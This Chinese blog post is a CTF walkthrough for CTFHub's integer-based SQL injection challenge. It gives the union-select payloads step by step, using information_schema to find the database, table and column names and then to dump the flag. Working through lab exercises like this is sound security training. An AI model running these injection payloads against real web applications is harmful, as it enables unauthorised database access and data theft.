CTFHub SQL注入 整数型注入

大城市里の小女人 提交于 2020-02-12 21:10:14

CTFHub SQL注入 整数型注入

强烈推荐这个网站 CTFhub https://www.ctfhub.com/
分各个类别,题目由易到难

这题还是很基础的,有各种提示
打开是源码,?id=处存在注入
/?id=1 or 1=1
在这里插入图片描述
然后就是爆数据库名,information_schema三步
以下是详细步骤:

  1. ?id=1 or 1=1 union select 1,database()
    在这里插入图片描述得到数据库名为sqli
    2.?id=1 or 1=1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
    在这里插入图片描述
    回显得到表名
    3、
?id=1 or 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='143232859127690'

在这里插入图片描述得到字段名flag
4.

?id=1 or 1=1 union select 1,group_concat(flag) from sqli.143232859127690

在这里插入图片描述得到flag

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!